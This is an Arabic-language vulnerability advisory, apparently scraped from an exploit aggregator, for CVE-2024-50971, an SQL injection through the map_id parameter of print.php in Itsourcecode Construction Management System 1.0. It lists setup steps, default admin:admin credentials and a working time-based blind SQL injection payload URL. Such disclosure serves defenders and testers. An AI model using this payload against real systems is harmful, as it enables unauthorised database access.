## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-AKHLAK2511-CVE-2024-50971
# CVE-2024-50971
## الوصف
تسمح ثغرة حقن SQL في ملف print.php الخاص بنظام إدارة الإنشاءات Itsourcecode الإصدار 1.0 للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر المعامل map_id.
## نوع الثغرة
حقن SQL
## البائع
Itsourcecode
## قاعدة الكود المتأثر:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ \- 1.0
## المكون المتأثر:
نظام إدارة الإنشاءات Itsourcecode v1.0 معرض لحقن SQL من خلال المعامل map_id في صفحة print.php.
## نواقل الهجوم:
1. قم بإعداد التطبيق محليًا، وسجل حسابًا، ثم سجل الدخول باستخدام بيانات المشرف admin:admin
2. انتقل إلى عنوان URL التالي في متصفحك: http://localhost/monitoring_system/print.php?map_id=67
3. حقن حمولة SQL: قم بتعديل المعامل map_id في عنوان URL لإدراج حمولة حقن SQL زمنية. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm